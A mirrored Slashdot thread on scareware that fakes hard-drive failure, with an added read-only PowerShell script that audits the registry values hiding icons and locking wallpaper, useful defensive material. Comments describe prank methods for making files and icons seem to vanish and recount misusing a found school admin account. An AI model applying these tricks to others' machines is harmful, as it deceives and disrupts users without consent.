Slashdot Mirror


New Malware Simulates Hard Drive Failure

An anonymous reader writes "A nasty strain of malware goes beyond mere sensational alerts, it makes it seem the user's hard drive is failing. It moves files from All Users and the current Windows user's profile into a temporary location, making it appear as though problems with the hard drive are causing files to disappear. It also disables a user's ability to change wallpaper images and sets registry keys to hide certain icons — giving the impression that programs are going missing as well. Of course, it's all done in an attempt to get people to buy the software that will fix it."
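The summary does not name the registry values the malware sets, only their effect (icons hidden, wallpaper locked, profile folders emptied). The PowerShell audit below is an added example, not code from the article or any commenter: it reads the standard per-user Explorer and ActiveDesktop policy values that produce exactly those symptoms and reports any that are set, then counts the contents of the profile folders so a folder that merely looks empty can be told apart from one whose files were moved. Which values this particular strain touches is an assumption of the example; the script is read-only and changes nothing.

```powershell
# Added example (not from the article): audit the per-user Explorer settings that
# can make icons vanish and lock the wallpaper, the symptoms the summary describes.
# The article does not say which values the malware sets; these are the standard
# policy values with those effects, so treat the mapping as an assumption.

$checks = @(
    @{ Path   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
       Name   = 'NoDesktop'
       Effect = 'hides every desktop icon' },
    @{ Path   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
       Name   = 'NoDrives'
       Effect = 'hides drive letters in Explorer' },
    @{ Path   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop'
       Name   = 'NoChangingWallPaper'
       Effect = 'blocks changing the wallpaper' },
    @{ Path   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
       Name   = 'HideIcons'
       Effect = 'hides desktop icons (user toggle rather than policy)' }
)

# Returns one object per value that exists and is non-zero, i.e. actually in force.
function Get-SuspiciousExplorerPolicy {
    foreach ($c in $checks) {
        if (-not (Test-Path -Path $c.Path)) { continue }
        $item  = Get-ItemProperty -Path $c.Path -ErrorAction SilentlyContinue
        $value = $item.($c.Name)
        if ($null -ne $value -and $value -ne 0) {
            [pscustomobject]@{
                Path   = $c.Path
                Name   = $c.Name
                Value  = $value
                Effect = $c.Effect
            }
        }
    }
}

# Counts items in the profile folders the summary says get emptied, once as Explorer
# shows them and once including hidden items, so "looks empty" and "is empty" differ.
function Get-ProfileFolderCounts {
    foreach ($folder in 'Desktop', 'Documents', 'Pictures') {
        $p = Join-Path -Path $env:USERPROFILE -ChildPath $folder
        if (-not (Test-Path -Path $p)) { continue }
        $visible = @(Get-ChildItem -Path $p -ErrorAction SilentlyContinue).Count
        $all     = @(Get-ChildItem -Path $p -Force -ErrorAction SilentlyContinue).Count
        [pscustomobject]@{ Folder = $p; Visible = $visible; IncludingHidden = $all }
    }
}

$hits = @(Get-SuspiciousExplorerPolicy)
if ($hits.Count -eq 0) {
    'No icon-hiding or wallpaper-lock values are set for the current user.'
} else {
    'Explorer policy values currently in force for this user:'
    $hits | Format-Table -AutoSize
}
'Profile folder contents (visible vs. including hidden):'
Get-ProfileFolderCounts | Format-Table -AutoSize
```

Run it in the affected user's session, since the values live under HKCU and a different account sees a different hive. A folder whose IncludingHidden count is also zero is consistent with the moved-files behaviour in the summary rather than with files merely hidden, which is useful to know before anyone concludes the drive itself is failing.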

294 comments

  1. Hey buddy! by MrEricSir · · Score: 4, Funny

    Nice computer you got there. Would be a shame if anything were to happen to it. My buddy Vinny here, he sells "protection" against these kinds of problems. You pay every week, and there ain't gonna be no problems, capiche?

    --
    There's no -1 for "I don't get it."
    1. Re:Hey buddy! by Anonymous Coward · · Score: 0

      What is an "All Users" and what do you mean "Windows"? This is a basement! I have only doors! And I'm the only one here.

    2. Re:Hey buddy! by Anonymous Coward · · Score: 0

      Italians are not a race. They are a nationality.

    3. Re:Hey buddy! by wmbetts · · Score: 0

      They're not?

      --
      "Ubuntu" -- an African word, meaning "Slackware is too hard for me". - stolen from Dan C alt.os.linux.slackware
    4. Re:Hey buddy! by blair1q · · Score: 0

      Racists don't get to define the semantics of their demonization.

    5. Re:Hey buddy! by R3d+M3rcury · · Score: 2

      This reminds me of a funny trick to play on somebody from back in my mainframe days...

      Create a directory with the same name as the home directory inside the user's home directory. Set a login script to place the user into that directory.

      So they try to get to their files and there's nothing there. Everything looks normal. Usually, someone with half-a-clue can figure it out pretty quickly, but it does provide that brief moment of terror that gets the blood pumping in the morning.

    6. Re:Hey buddy! by Anonymous Coward · · Score: 0

      the word you're looking for is bigot in this case

    7. Re:Hey buddy! by ozmanjusri · · Score: 5, Funny

      what do you mean "Windows"?

      "Windows" is a computer operating system used by many people, most often without the owner's permission.

      --
      "I've got more toys than Teruhisa Kitahara."
    8. Re:Hey buddy! by Anonymous Coward · · Score: 3, Funny

      That reminds me of a trick I used to play back in my mainframe days too. I'd just delete everything a user had in their directory. Man, you should have seen the look on their faces. I'll never forget the feeling of power I experienced either....

    9. Re:Hey buddy! by PCM2 · · Score: 3, Interesting

      Actually I think the word you both are looking for is "straw man."

      --
      Breakfast served all day!
    10. Re:Hey buddy! by Anonymous Coward · · Score: 0

      Nowadays it's more fun today with mount --bind over the top of their home directory..

    11. Re:Hey buddy! by mcavic · · Score: 1

      Or in the DOS days, create a RAM disk and substitute it for Drive C. Very convincing.

    12. Re:Hey buddy! by MstrFool · · Score: 2

      There was a prank going around the Gateway 2000 tech centers that I found quite amusing. Do a screenshot of the desktop, set it as the background, then move the icons to a folder. I found it really showed the clued from the clueless. Quite a few techs called for someone to fix their system. And no, I wasn't the one doing it, though I was the one to fix it many times.

      --
      Question reality.
    13. Re:Hey buddy! by geminidomino · · Score: 1

      Well he did say (or rather, misspelled) "capisce," which is an Italian word...

    14. Re:Hey buddy! by geminidomino · · Score: 1

      Here, you dropped this:

      <clickety-click>

      You Bastard.

    15. Re:Hey buddy! by Aeternitas827 · · Score: 1

      God bless sudo.

      --
      I don't post AC. I like my -1, Flamebaits. Trump/Sheen 2012 on the Batshit Insane ticket!
    16. Re:Hey buddy! by dragonturtle69 · · Score: 1

      Did that once, and once only. The butt of the joke hard booted thinking that his PC was non-responsive, fraking up his HKLU (silly registry, why?). "Last Known Working" was my friend that day....

      --
      "What luck for the rulers that men do not think." - Adolph Hitler
    17. Re:Hey buddy! by Aeternitas827 · · Score: 1

      Did this in HS with an admin account I found perusing the Active Directory. Except, instead of moving the icons, I used a VBScript-created error box that looked real bad, and wouldn't go away when clicked on (it was there in the screencap).

      The freshmen and teachers panicked for a few minutes, and a day or two later, that admin account was gone. But not the other two, named Test2 and Test3.

      --
      I don't post AC. I like my -1, Flamebaits. Trump/Sheen 2012 on the Batshit Insane ticket!
    18. Re:Hey buddy! by arth1 · · Score: 1

      Yes, 'cause it seriously needs it.

      Using sudo to do the job of chmod, chown and setfacl is like using "kill -9" as your standard way of stopping processes, or like changing the DPI to get larger text. It gets the job done, much the same way as using a sledgehammer to swat flies; you risk doing a lot of damage and there are better suited tools available.

    19. Re:Hey buddy! by Fjandr · · Score: 1

      I had a friend who wrote a small BASIC script that simulated a FORMAT prompt, which would proceed regardless of what the user selected. It then returned a prompt with an empty disk, complete with a bunch of basic, apparently functional commands.

      That was amusing when it was run on a couple of the lab computers.

    20. Re:Hey buddy! by SheeEttin · · Score: 1

      Yeah, that one's timeless. There's also a variant in which you set the desktop to a broken-LCD image (i.e. corruption, garbage) and hide the icons and taskbar.
      Of course, the fact that the cursor still works would be a giveaway. (Unless you change that too--but that's a bit too much.)

    21. Re:Hey buddy! by Anonymous Coward · · Score: 0
    22. Re:Hey buddy! by Aeternitas827 · · Score: 1

      You're right, those are all examples of overkill.

      However, it is about the only way to get the woman in your life--mom or significant other--to make you a goddam sandwich.

      --
      I don't post AC. I like my -1, Flamebaits. Trump/Sheen 2012 on the Batshit Insane ticket!
    23. Re:Hey buddy! by superdave80 · · Score: 1

      But he's not racist, since Italian is not a race. So he CAN define the semantics of his demonization. See, it all works out!

    24. Re:Hey buddy! by Isaac+Remuant · · Score: 1

      Be careful with this if you are not 100% sure you'll be around to uncover the prank if it gets out of hand.

      I played this once on a half computer tech, half sound tech and things went pretty bad. I hid and locked the taskbar and all the icons (on XP) and stored them in some other folder for easy recovery. But I didn't go to work the following day due to personal reasons. It turns out, this guy and an engineer went nuts over the problem and ended up going back to a recovery point.

      I neglected to tell him the truth until I was sure he had cooled off... About 10 months. :P

      Again, careful with what seem like innocent pranks, victims can end up doing a lot of damage and it will be your fault.

      --
      "Science can amuse and fascinate us all, but it is engineering that changes the world. " - Asimov.
    25. Re:Hey buddy! by binarylarry · · Score: 1

      Touché

      --
      Mod me down, my New Earth Global Warmingist friends!
    26. Re:Hey buddy! by tlhIngan · · Score: 1

      The best way to do this prank is to not move ALL the icons away. Leave a few of them there so they work. It'll puzzle the hell out of them as they can't seem to figure out why some icons work (consistently, too) but others just refuse.

      You'll also find out who notices that the icons highlight.

    27. Re:Hey buddy! by snemarch · · Score: 1

      HKLU - the unholy bastard child of local machine and current user; making-of flesh movie coming to a theater near YOU!

      --
      Coffee-driven development.
    28. Re:Hey buddy! by Oligonicella · · Score: 2

      I never understood nor looked on with anything other than raw hate, fucking around with another person's work or personal machine. You're deciding for your personal, shallow jollies that someone else's property and time have no value other than to amuse you. Do that to mine and there will be definite and unavoidable physical violence. I will even get fired to do it.

    29. Re:Hey buddy! by Anonymous Coward · · Score: 0

      And in fact, Linux, *BSD, etc are not in fact "Operating Systems", they are "Cooperating systems".

    30. Re:Hey buddy! by blair1q · · Score: 1

      he's a racist.

      only racists use that argument.

  2. The Game of Catchup by MightyMartian · · Score: 4, Insightful

    Had this one get on one of the computers I administer. Managed to poison the profile and for a brief while I thought the files had been deleted. Of course, I got the inevitable "isn't your AV and anti-malware software up to date", to which I responded "As much as can be, the user is relied upon not to be a simpering moron who clicks on every possible link."

    Oh, and by the way, Microsoft, your fucking browser still sucks and is still atrociously insecure. Shape up, Redmond.

    --
    The world's burning. Moped Jesus spotted on I50. Details at 11.
    1. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      This is why the only solution is a GNU/Linux solution. You tell people two simple things. Click the update button when the updates happen and don't download ANYTHING. If you want a program click the Ubuntu Software center and search for it. Everything else is going to potentially infect you.

    2. Re:The Game of Catchup by Moryath · · Score: 1

      This is also why end-users shouldn't have install rights. Period.

    3. Re:The Game of Catchup by bleble · · Score: 1, Interesting

      You tell people two simple things. Click the update button when the updates happen

      How do you think that will work out? The bad guys will just craft their website to look like an update and the user will stupidly run it just like before.

    4. Re:The Game of Catchup by Anonymous Coward · · Score: 1

      I got this virus the other day, running Firefox on Vista Ultimate 64 bit :(

      Not sure this one is an IE issue. Had Trend Micro business security on here as well and that sure as hell didn't catch it either ;/ Managed to remove it easily enough in safe mode though - although it was largely manual.

    5. Re:The Game of Catchup by The+Dawn+Of+Time · · Score: 3, Insightful

      "it's like a computer, only useless."

    6. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      Blame the browser, but not the simpering morons, since this time they don't have to click on anything in IE -- had this happen to me a week or two back. Work machine, XP, admin account, and only IE8 allowed. (Yeah, my employer seems to hate themselves pretty badly.)

    7. Re:The Game of Catchup by somersault · · Score: 0

      What "useful" stuff do you need installed that you can't ask IT to install?

      --
      which is totally what she said
    8. Re:The Game of Catchup by gad_zuki! · · Score: 3, Insightful

      >Oh, and by the way, Microsoft, your fucking browser still sucks and is still atrociously insecure. Shape up, Redmond.

      Really? Care to point to some statistics showing me big holes in IE9 that are actively used by malware?

      Not much out there. Oh, there's no shortage of Java, Flash, and Adobe Reader holes, and according to stats lifted from crimepacks those are the ones used.

      I just looked at the stats on my website. 90% of those users have Java installed. How many of those are the latest version? Maybe 50%. Most of the Flash installs are not the latest version. Who knows what version of Reader they have.

      Plugin security is a nightmare right now. Blame Sun and Adobe for not having autoupdaters like Chrome does for Flash. Joe User has no idea what he's doing with a computer. Blaming MS isn't really helping him.

    9. Re:The Game of Catchup by uctechdude · · Score: 0

      > Really? Care to point to some statistics showing me big holes in IE9 that are actively used by malware?

      Microsoft has a relevant web browser??? I thought Java and Flash were exploits for IE. Both have updaters but you don't _have_ to install them. There is no forced update like Chrome uses.

      --
      Linux fixes all the cracked Windows.
    10. Re:The Game of Catchup by Moryath · · Score: 1

      Nothing, really.

      Especially in the days when a simple Remote Help session to take screen control and approve/deny the program is all that's needed.

      If you're going to have end-users running with install rights, you're going to have orders of magnitude more infections. Partly because they are going to reflexively "click yes" on every single thing they see, partly because you're going to have a defined population of users who are the kind of morons who install every "ooh look it's free" widget from Bonzi Buddy to Weatherbug and all the tagalongs and security holes that come in along with them.

    11. Re:The Game of Catchup by mrnobo1024 · · Score: 3, Informative

      That's all well and good in a corporate environment, but do you really expect every home user to have his own personal IT department?

    12. Re:The Game of Catchup by MightyMartian · · Score: 1

      As I said, the user could not install the malware on the system, but they had execution rights to their own folders, so it poisoned their profile. I was going to implement a GPO-based SEP, only to find out it's trivial to bypass.

      --
      The world's burning. Moped Jesus spotted on I50. Details at 11.
    13. Re:The Game of Catchup by 19thNervousBreakdown · · Score: 2

      Anything I want to use less than two weeks from now.

      --
      <xml><I><am><so><damn>Web 2.0</damn></so></am></I></xml>
    14. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      Just out of curiosity, how is IE9 "atrociously" insecure? I use it as much as Firefox and never had any issues.

    15. Re:The Game of Catchup by MobileTatsu-NJG · · Score: 3, Informative

      This is why the only solution is a GNU/Linux solution..

      I'd love to see your MRI scan while you tell people this.

      --
      "I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)

    16. Re:The Game of Catchup by machine321 · · Score: 1

      Java and Adobe reader *do* have autoupdaters. How do you think toolbars get installed?

    17. Re:The Game of Catchup by PsychoSlashDot · · Score: 1

      This is why the only solution is a GNU/Linux solution. You tell people two simple things. Click the update button when the updates happen and don't download ANYTHING. If you want a program click the Ubuntu Software center and search for it. Everything else is going to potentially infect you.

      That's cute, but if users were inclined to obey exactly those instructions, Windows would be fine.

      --
      "Oh no... he found the .sig setting."
    18. Re:The Game of Catchup by Attila+Dimedici · · Score: 3, Insightful

      Except that Windows does not have anything like the Ubuntu Software center, or whatever the repository is called in other distributions.

      --
      The truth is that all men having power ought to be mistrusted. James Madison
    19. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      No, don't blame the browser. Blame either: the adobe vulnerability that allowed the exploit or the IT dept. that didn't patch the exploit or allowed the user to run with admin rights. The browser had nothing to do with it. As mentioned above, you get the same thing using Firefox - since the exploits are Flash or Adobe Reader the browser really has nothing to do with it.

    20. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      After receiving my ThinkPad W520 (i7-2920XM) from Lenovo, which came with Win7 (aka NT v6.1) Professional, I wanted to see what Windows 7 looked like, so after the first boot and logging in I checked to make sure I was admin. I tried to run gpedit, nope, access denied, so then I tried wmic, also access denied. So about 4 minutes after first boot I realized Microsoft was once again selling their software with all the doors open, I powered off and pulled out my Red Hat CD.

      The only version of Windows you have a chance of securing is Ultimate, and then you'll later find out there's been a backdoor open since 1997. And then there are those people that use virus scanners, yeah, I'm gonna pay some company to install a root kit on my computer, yeah right. And then you have this other group that use free virus scanners, what are you, just stupid?

    21. Re:The Game of Catchup by Bacon+Bits · · Score: 4, Funny

      My relatives certainly seem to think they do.

      --
      The road to tyranny has always been paved with claims of necessity.
    22. Re:The Game of Catchup by toadlife · · Score: 1

      And when Ubuntu moves from 1% to 85% of the desktop market share (any day now, right?), we'll get to see how well that repository model scales.

      --
      I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
    23. Re:The Game of Catchup by bensode · · Score: 1

      Except that Windows does not have anything like the Ubuntu Software center, or whatever the repository is called in other distributions.

      Sure it does. I believe it rhymes with torrent.

      --
      "Keep at least 3-6 full bottles of hard alcohol on hand, a 2 week resignation notice,..." - Poetmatt
    24. Re:The Game of Catchup by LurkerXXX · · Score: 1

      Bah, I'm at a major research hospital. The inept IT department has us all on IE6.

    25. Re:The Game of Catchup by Attila+Dimedici · · Score: 1

      If you think that is the same, you have not worked with Linux.

      --
      The truth is that all men having power ought to be mistrusted. James Madison
    26. Re:The Game of Catchup by Attila+Dimedici · · Score: 2

      That is certainly a possibility. However, the repository model does certainly provide for much greater security, especially when it contains such a large range of free software as most current Linux distributions. Considering that the Apple IOS app store model is the same sort of distribution model it seems likely that it scales.

      --
      The truth is that all men having power ought to be mistrusted. James Madison
    27. Re:The Game of Catchup by Moryath · · Score: 1

      No, but why should they be running as superuser just to open their email client?

    28. Re:The Game of Catchup by Anonymous Coward · · Score: 1

      Our IT department has a very narrow concept of what is useful: MS Office, the various corporate database software packages, group email and that's pretty much all they are willing to manage for my dept. If we want anything else, we pretty much have to purchase and install it ourselves out of dept budgets or our own pockets. What about all the little utilities and other essential but unsupported software that makes my workday so much easier? UltraEdit, ACDSee, Teleport Pro, SecureCRT, VNC, Photoshop, Acrobat, CorelDraw, WinAmp and VLC (for background music or lunch breaks), Firefox, Mozilla Prism (awesome app BTW), TrueCrypt, Vice Versa for backup, DragonDictate... that's just off the top of my head. I rely on all those apps to "do my job" in the most efficient manner, but most are not IT supported. So I insist that any PC IT provides has me listed as an admin with install rights. The general IT bias is against this concept, but in the real world people are much more productive when they don't need to beg the helpdesk staff every time they want to install something, or justify its use to a committee.

    29. Re:The Game of Catchup by RobbieThe1st · · Score: 1

      Except that it won't: The user'd have to:
      1. Click on the fake link.
      2. Accept the file download (FF at least asks you to save or cancel with any download).
      3. Right-click the saved file, click Properties, and check the 'make executable' button.
      4. Double-click on the application, and then enter your password.

      I think that'd take some doing to convince the user to do all that, especially when the user's used to clicking on the Main Menu -> System -> Update or w/e.

    30. Re:The Game of Catchup by hairyfeet · · Score: 4, Insightful

      You forgot the third part...spend endless hours on the forums cursing because "update foo broke my (insert device) drivers!". Seriously someone needs to hunt down Torvalds and give that sucker a good ass kicking.

      It is 2011 and he still acts like it is 1992 and the kernel is his personal playtoy. Every single decent OS, OSX, Windows, Solaris, BSD, hell even OS/2, has had driver level ABIs for a decade or more, yet Torvalds still refuses to allow this simple fix to keep from borking everything when he gets an itch to fuck with shit.

      So I'm sorry but as a retailer that step three makes it so I'm unable to sell machines with your OS, or support your OS after the sale. The annual forum hunts just suck too much of my already limited time. Fix that and the whole "software tied to which kernel you're using" mess and then I'll be happy to help your OS grow in numbers, but as it is now it is better to stick with Windows, even if the occasional user stupidity manages to get through the AV (usually because they tell the AV to allow it because the malware promises them some reward for doing so) than to have the guaranteed breakdown every six damned months for the life of the machine thanks to Torvalds and his kernel fucking.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    31. Re:The Game of Catchup by Ihmhi · · Score: 2

      Here's what works for me. "If I were a plumber, I sure as hell wouldn't unplug your toilet for free. That's my livelihood, and the only person who gets a blank check in my business is my mom."

    32. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      Mod parent insightful.

    33. Re:The Game of Catchup by CrankyFool · · Score: 1

      Actually, you've got some good ideas, but once they're implemented, you no longer need GNU/Linux.

      My life's been far better since I rebuilt my parents' computer with Windows 7 and then made it so they were not admins/power users, so they couldn't install anything.

    34. Re:The Game of Catchup by whoever57 · · Score: 1

      Plugin security is a nightmare right now. Blame Sun and Adobe for not having autoupdaters like Chrome does for Flash

      I do blame MS. Not for vulnerabilities in Flash, Java and other plugins, but for not providing an API that would allow third party programs to plug into Windows update to automatically download (which could be from the vendor's site) and install the update.

      How many different updaters does a system need? Then, there are updaters that simply don't work unless you are logged in with admin privileges (I'm looking at you, Apple -- sure it downloads the new release, but then it fails to update -- what's the use of that?).

      --
      The real "Libtards" are the Libertarians!
    35. Re:The Game of Catchup by laurelraven · · Score: 1

      My solution is simpler for my users: they just do their work. Their systems magically update themselves at night (we disable rights to shut down their machines), scan themselves at night, and their user accounts have no local admin rights on their machines.

      When I ran into an example of this, I remotely rebuilt the person's profile and the infection was effectively gone (or at least neutered, and my AV took care of the trailing bits). If that hadn't taken care of it (through some local rights escalation vulnerability or other), I would just drive over to the site with my external hard drive and a copy of clonezilla and have them back up to normal with a brand new copy of my corporate image in half an hour.

      It's not worth the time and hassle to fight these things anymore. When the infection appears, just carpet bomb: it's much faster, and much more likely to work, and the user loses almost nothing.

      --
      RTFA is Known to the State of California to cause cancer.
    36. Re:The Game of Catchup by laurelraven · · Score: 1

      For the sake of your point, it does: Windows Update. Further, I can easily set it so it automatically runs without their intervention.

      I'm sure you could do that with Ubuntu, as well...

      Let me be clear: I'm not a Microsoft fanboi or shill, and in fact prefer Linux. I also don't hate on Microsoft like I used to, and see its use and benefits. Its security and update model may not be up to Linux standard yet, but they are showing a lot of progress and promise in that direction; they likely will never quite get there, but they are trying. I can lock a Windows network workstation up pretty well, and administer hundreds of boxes and users mostly by myself thanks to a lot of the built-in automation they have like GPO. Sure, I could do that with Linux, but it would take one hell of a lot longer, time I just don't have with as large a user base as I have to work with.

      For my environment, Microsoft is also cheaper. Time IS money in the business world, and with non-profit licensing, MS is not really all that expensive, either.

      Every environment is different, and has different needs. I can't even get my users to lock their systems when they walk away from their desktops, and that is just a two-key combination (Windows key+L). Do you really think I can expect ALL of them to click on "Update" whenever they see it?

      --
      RTFA is Known to the State of California to cause cancer.
    37. Re:The Game of Catchup by inflex · · Score: 2

      Agreed. Even if the ABI over time supports less and less of the available functionality, at least it's -something- that's stable. The fact that Linux does have as many drivers as it does is testament to the persistence of the masochists out there. I appreciate what Linus is trying to avoid, but at the same time we're getting to the point where the kernel needs to offer an olive branch to people who have more to do in their lives than just update their driver code every time the kernel twists and turns.

    38. Re:The Game of Catchup by toadlife · · Score: 1

      Or it could be a deb/rpm/xxx package and the luser would happily enter their password when prompted after clicking on it.

      --
      I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
    39. Re:The Game of Catchup by laurelraven · · Score: 1

      I insist that any pc IT provides has me listed as an admin with install rights.

      If you were in my environment, I would deny that request. What makes you better than everyone else? How is IT supposed to adequately manage their systems if everyone is a mini-admin? Sure, you personally may not cause me any headaches, because you know what you are doing... however, everyone thinks they know what they are doing. I'd rather take the time to vet the software my users need, not from a need to control everything, but from a need to be able to manage my network.

      Some are just doing it for a power trip... they are usually easy to spot, as they won't help you install anything unless you kowtow to them just the right way. I just want to make sure it isn't a virus and isn't going to interfere with the operation of other critical software on the machine.

      I'd find the other side of the coin frustrating to be on, granted...however, remember there is often a good reason it is that way.

      --
      RTFA is Known to the State of California to cause cancer.
    40. Re:The Game of Catchup by Billly+Gates · · Score: 1

      IE 9 has the most security out of the box of any browser to date, with full XSS protection and memory exploit protections. It is sweet. Sure, Firefox has NoScript, but it is not installed by default. Does Chrome have XSS cross-site protection?

      IE 9 is the first IE that doesn't suck. I am using it right now and it scrolls smoother and offers better acceleration than both Firefox or Chrome. I highly recommend Windows users upgrade even if they use other browsers as many apps use HTML embedded as IE helper objects for their guis and it is nice to have acceleration and more protection.

      I still use Firefox mostly, by the way, and I am not a MS fanboi.

    41. Re:The Game of Catchup by RobbieThe1st · · Score: 2

      Ah, but there's a few problems with that:
      1. No universal package. So, you can guess deb and be right for that 50 percent (at best) of the Linux-using population, but still... You've halved the number of potentially infectable systems.
      2. Some distributions don't have such a GUI method; Debian for example. Which limits your malware's influence even further.
      3. Gdebi, at least, comes up with a big red warning if you try to install an unverified package, which should provide /some/ security.

      4. Any multi-user system, corporate install or geek-installed system will probably not allow sudo or root access to our luser's account, meaning that such an install won't work. The previous idea of a downloaded executable is more likely, as it could run using user permission.

      I just think it'd be a lot harder than it would be on Windows or Mac, because on Linux everyone's used to using the repos for installing everything - Install by doubleclick isn't going to be done by accident.

    42. Re:The Game of Catchup by RobbieThe1st · · Score: 1

      I might add to this that in the case of lusers who can't and won't learn, we have the solution also: A Chromebook. Impossible to screw up, and it runs Linux also.

    43. Re:The Game of Catchup by Anonymous Coward · · Score: 1

      Repositories scale, jackass. Fucking mouth breathing Windows using motherfuckers. Did your mother change her mind in the middle of the abortion after only a third of your brain had been sucked out?

    44. Re:The Game of Catchup by FrellMeDead · · Score: 1

      This has nothing to do with the type of browser the user uses. A large number of infections occur as a result of poor user practices (i.e. the user clicks on every link that they can). Some browsers can help protect from some of these infections as a result of addons/plugins like NoScript, etc., but in the end it's the user that is the real start and end of these issues. Blame the user instead of just slinging more B.S. towards Microsoft. Yes, some problems, especially in the past, could/can be attributed to Microsoft's security implementation, but they regularly issue patches and generally fix any known issues overall and have even provided free antivirus/firewall security. Place the blame where it is definitely due... on the user and those training the user(s).

    45. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      Joe User has no idea what he's doing with a computer.

      Because M$ hasn't designed their software for their target audience.

      Software is soft, it can be anything we want it to be, yet apologists and shills for the vendors continue to claim it's anybody's fault but their own.

      Blaming MS isn't really helping him.

      Assigning the blame is entirely appropriate. In this case treating software installation as if it's a routine occurrence so users will ignore popups when they do occur and also not designing an OS, the operating system, to protect the entire system from malicious and broken software.

    46. Re:The Game of Catchup by hairyfeet · · Score: 3, Insightful

      Thank you! You are the FIRST one that hasn't screamed and reached for the pitchfork, even though as I pointed out every single other OS with any numbers at all has had this "feature" (which I wouldn't call a feature, just common sense design) for over a decade. The only answer you usually get is a link to the religious rant against ABIs, where the writer goes so far as to call those that don't hand the developers ALL of their code "leeches" and hopes that Torvalds breaks their drivers often even when that bones the very users Linux so desperately needs.

      Look Linux guys, I'm a small town computer retailer, the kind of guy you want on your side because MSFT doesn't give us any breaks (I use System Builders and OEM) and I actually care about my customers and want them to have a safe and happy computing experience. Linux would mean lower costs, so I would be able to sell for lower prices or offer better hardware, it would be a win for me AND my customers!

      But I simply cannot in good conscience offer your OS, when even with 20+ years of computing experience I often bash my head against the wall fighting the damned thing! An update should never break drivers okay? And certainly not when you are cranking out said updates on a 6 month schedule. At that pace just as you get the thing finally running stable here it comes! yet another week or two spent scouring the web looking for "fixes" that involve huge messes of CLI that must be typed PERFECTLY or they cause havoc. Do you HONESTLY think I can offer that to my customers? People who just want to use a PC, not get an education in Linux forums and Bash commands?

      And before anybody says LTS let me say that LTS is a really bad joke, because as long as software is tied to which kernel you are using LTS is simply a codeword for "can't use any new software" and the fact that software is actually tied to which kernel you have just shows the madness that is the kernel situation!

      I want Linux to succeed, I really really do. I have written articles pointing out what needs to change for small businesses and retailers to embrace Linux, and I remember the days of OS/2 and GEM and Commodore and how nice it was to actually have plenty of choice. But the current situation in Linux on the desktop is like a bad joke, with broken drivers, constantly shifting internals, user programs tied to which kernel you are using, dependency hell like the old days of Win9X, and to top it all Torvalds constantly making major changes which breaks programs and drivers left and right without a care in the world, like the kernel is his personal plaything and not the center of a multibillion dollar OS with millions depending on it.

      So please Linux users, demand change. Demand Torvalds give a functional ABI or step down so someone else can give you what everyone else has had for over a decade, demand that while CLI still be optional that all software be usable without it, demand stability and the ability to keep software past an update, and demand that the 6 month update insanity be replaced with a more reasonable 3 or 5 year schedule, with plenty of beta testing before being handed to the masses. Because there are plenty of guys like me that would be happy to line our shelves with your OS, but as it is now just keeping the machines functional past updates would be a full time job. It is 2011, not 1991, and this is simply inexcusable.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    47. Re:The Game of Catchup by snemarch · · Score: 1

      No, but why should they be running as superuser just to open their email client?

      Beats me, that's why I have them run Vista (SP1 or later) or Win7.

      The people who are going to ignore warnings and click yes on the UAC prompts wouldn't be any safer off on other operating systems, they'd happily type in their user credentials and get their fresh copy of Mac Defender or whatever.

      --
      Coffee-driven development.
    48. Re:The Game of Catchup by snemarch · · Score: 2

      People are quick to slam IE, but in fact most malware goes in through Flash, Java or Acrobat Reader. Internet Explorer certainly isn't perfect, but security-wise it's come a long way; IE8 or IE9 combined with Vista/Win7 on proper UAC'ed accounts is actually pretty decent these days, and the sandboxing helps a fair amount against exploits for the aforementioned three pieces of crapware.

      That said, I run FireFox even though it's technically less secure - I prefer the higher HTML standards compliance and addons.

      --
      Coffee-driven development.
    49. Re:The Game of Catchup by snemarch · · Score: 1

      They aren't full-auto, though, and check for updates relatively seldom. And when Joe User sees a "please shutdown your browser to install update" right in the middle of his browsing session, he's going to click "nah, postpone" and forget all about it. Until next time the prompt pops up... in the middle of his browsing session. The Flash updater is notoriously lame, not offering a "retry" button.

      --
      Coffee-driven development.
    50. Re:The Game of Catchup by snemarch · · Score: 1

      If Microsoft opened up Windows Update for 3rd-party applications, how many do you reckon would actually use it?

      Yup, it would be sweet to have one central updating facility, and it's one of the few *u*x things I miss in Windows; I just don't see it ever going to work in the Windows ecosystem (an Appstore for phone/tablet might, but that wouldn't cover desktops and legacy software).

      --
      Coffee-driven development.
    51. Re:The Game of Catchup by snemarch · · Score: 1

      [...]and also not designing an OS, the operating system, to protect the entire system from malicious and broken software.

      The OS is designed with a lot of protection, do check up on the NT security model. The problem consists of

      • 3rd party developers who have been ignoring application design guidelines.
      • Users who click yes to anything and enter user credentials without thinking.
      --
      Coffee-driven development.
    52. Re:The Game of Catchup by Attila+Dimedici · · Score: 2

      No, MS Update is nothing like the Ubuntu Software center (or the software repositories on other distros). You cannot get software from Windows Update.
      You apparently misunderstand my point. I am not saying that Ubuntu (or Linux in any form) is the end all and be all. My point is that the original poster had a point. The Linux model of software repositories of safe, free software for just about every conceivable purpose means that if I want software to do something that isn't important enough to spend money on it I don't have to search the web and risk that the software I find is malware (or contains malware).

      --
      The truth is that all men having power ought to be mistrusted. James Madison
    53. Re:The Game of Catchup by PsychoSlashDot · · Score: 1

      No, MS Update is nothing like the Ubuntu Software center (or the software repositories on other distros). You cannot get software from Windows Update.

      When you say "cannot", do you mean can? Admittedly the list is very small by current design, but Microsoft Security Essentials is available for distribution via Microsoft Update. So is Silverlight, equivalent to Adobe Flash. So are the various .NET libraries, equivalent to Java.

